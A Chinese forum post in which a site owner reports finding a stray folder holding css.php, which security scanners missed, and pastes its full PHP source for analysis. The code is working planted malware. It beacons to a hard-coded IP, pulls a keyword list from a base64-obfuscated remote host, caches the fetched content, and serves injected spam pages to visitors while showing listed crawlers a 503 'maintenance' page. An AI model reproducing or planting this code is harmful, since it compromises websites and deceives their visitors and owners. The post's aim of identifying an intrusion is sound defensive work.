发现网站目录下面多了一个文件夹,通过文件夹下面css.php链接了一些其他内容。通过360安全检测这些工具检测不出来任何问题,贴出来让大家分析分析。- <?php
- define('s_u','http://108.186.234.233/');
- define('m_i','1');
- define('h_t',$_SERVER['SERVER_NAME']);
- define('s_s','@Googlebot|EmbeddedWB|yahoo|MJ12bot|AhrefsBot|BLEXBot|EasouSpider|YandexBot|Exabot@i');
- function r_k($l){$ch = array('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9');$str='';for ($i = 0;$i <$l;$i++) {$str .= $ch[mt_rand(0,35)];}return $str;}
- function g_c($url){$ch = curl_init();curl_setopt ($ch, CURLOPT_URL, $url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT,10);curl_setopt ($ch, CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko");return curl_exec($ch);}
- class d58Cache {private $_unitNum = 999;private $_unitFloor = 3; private $_pix = '_';private $_now = 0;public $baseDir = ''; public $dirMode = 0777;
- public function __construct($baseDir = null) {
- if ($baseDir) {
- $this->baseDir = $baseDir;} else {$this->baseDir = dirname(__FILE__) . DIRECTORY_SEPARATOR . '_Data';}if ($_SERVER['REQUEST_TIME']) {$this->_now = $_SERVER['REQUEST_TIME'];} else {$this->_now = time();}}public function isExists($id, $timeout = 0, $isCreate = false) {$file = $this->hashId($id);if (!is_file($file)) {if (is_file($file . '.lock')) {return 'LOCKED';}return false;}return true;}public function set($id, $data = null) {return $this->_writeFile($this->hashId($id), $this->_encode($data));}public function get($id, $lockread = false) {return $this->_decode($this->_readFile($this->hashId($id), $lockread));}public function del($id) {return $this->_deleteFile($this->hashId($id));}public function hashId($id) {if (!is_numeric($id)) {$id = $this->enId($id);$notNum = 'a'; }$id = $tid = $id;$hash = '';$pow = 0;for ($i = $this->_unitFloor; $i ; $i--) {$pow = pow($this->_unitNum, $i);$unit = floor($tid / $pow);if ($unit > $this->_unitNum) {$unit = $this->_unitNum;}$hash .= $this->_pix . $unit . DIRECTORY_SEPARATOR;$tid = $tid - $unit * $pow;}unset($pow, $tid, $unit, $i);return $this->baseDir . DIRECTORY_SEPARATOR . $hash . ($notNum) . $id . '.txt';}public function enId($data) {return sprintf('%011u', crc32($data));}private function _encode($data) {$array = array('source' => $data);return '<?php die(\'Cache Page by d58Cache.\') ?>' . serialize($array);}protected function _decode($data) {$array = unserialize($data);return $array['source'];}protected function _writeFile($file, $data) {$dir = dirname($file);if (!is_dir($dir)) {mkdir($dir, $this->dirMode, true);}if (!is_file($file) && is_file($file . '.lock')){return false;}$mqr = get_magic_quotes_runtime();set_magic_quotes_runtime(0);$re = @ file_put_contents($file, $data, LOCK_EX); set_magic_quotes_runtime($mqr);return $re;}protected function _readFile($file, $lockread = false) {if (!is_file($file)){if (!$lockread) {return false;}$file .= '.lock'; if (!is_file($file)) {return false;}}return file_get_contents($file, null, null, 39);}protected function _deleteFile($file) {if (is_file($file)){return unlink($file);}return false;}public function lock($id) {$file = $this->hashId($id);if (!is_file($file) && is_file($file . '.lock')){return true;}return rename($file, $file . '.lock');}public function unlock($id) {$file = $this->hashId($id);if (is_file($file) && !is_file($file . '.lock')){return true;}return rename( $file . '.lock', $file);}}
- function s_p(){$d='';if(isset($_SERVER['REQUEST_URI'])){$d=$_SERVER['REQUEST_URI'];}else{if(isset($_SERVER['argv'])){$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];}else{$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];}}if(isset($_SERVER['SERVER_SOFTWARE']) && false!==stristr($_SERVER['SERVER_SOFTWARE'],'IIS')){if(function_exists('mb_convert_encoding')){$d=mb_convert_encoding($d,'UTF-8','GBK');}else{$d=@iconv('GBK','UTF-8',@iconv('UTF-8','GBK',$d))==$d?$d:@iconv('GBK','UTF-8',$d);}}$r=explode('#',$d,2);$d=$r[0];return $d;}function r_l(){return "?".r_k(4).'/'.r_k(mt_rand(4,6)).'.html';}
- set_time_limit(20);error_reporting(0);function r_c(){global $b1,$b1s;return trim($b1[mt_rand(0,$b1s)]);}
- define('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER['HTTP_USER_AGENT']);
- if(preg_match(s_s,u_s)){
- header('HTTP/1.1 503 Service Temporarily Unavailable');
- echo '对不起,页面维护中,请稍后访问!';
- die;
- }else {
- header('HTTP/1.1 200 OK');
- $cache = new d58Cache();
- $_pa=explode('/',$_SERVER['PHP_SELF']);
- $_mp=str_replace(end($_pa),'',$_SERVER['PHP_SELF']);
- define('m_l',$_mp);
- define('h_z',s_p());
- $m_d=md5(h_z);if ($cache -> isExists($m_d)){$d_c = $cache -> get($m_d);}else{$d_u=s_u.'?mi='.m_i.'&xu='.bin2hex(h_z);$d_u.='&xh='.bin2hex(h_t);$d_u.='&ml='.bin2hex(m_l);$d_c=g_c($d_u);if(!stristr(h_z,"sitemap.")) $cache -> set($m_d,$d_c);}
- if(!is_file("b.txt")){$btdb=g_c("http://s1".base64_decode("LmQ1OC5uZXQvcy8=")."getbt.php");if(!$btdb) $btdb=g_c("http://s2".base64_decode("LmQ1OC5uZXQvcy8=")."/getbt.php");
- if(trim($btdb)){$bts=fopen("b.txt","w");fwrite($bts,trim(mb_convert_encoding($btdb,'gbk','utf-8')));fclose($bts);}}
- $b1=file('b.txt');$b1s=ceil(count($b1)-1);$d_c=preg_replace_callback("/{link}/iUs", "r_l",$d_c);$d_c=preg_replace_callback("/{name}/iUs", "r_c",$d_c);echo $d_c;}
- ?>
复制代码 |
评论
直达楼层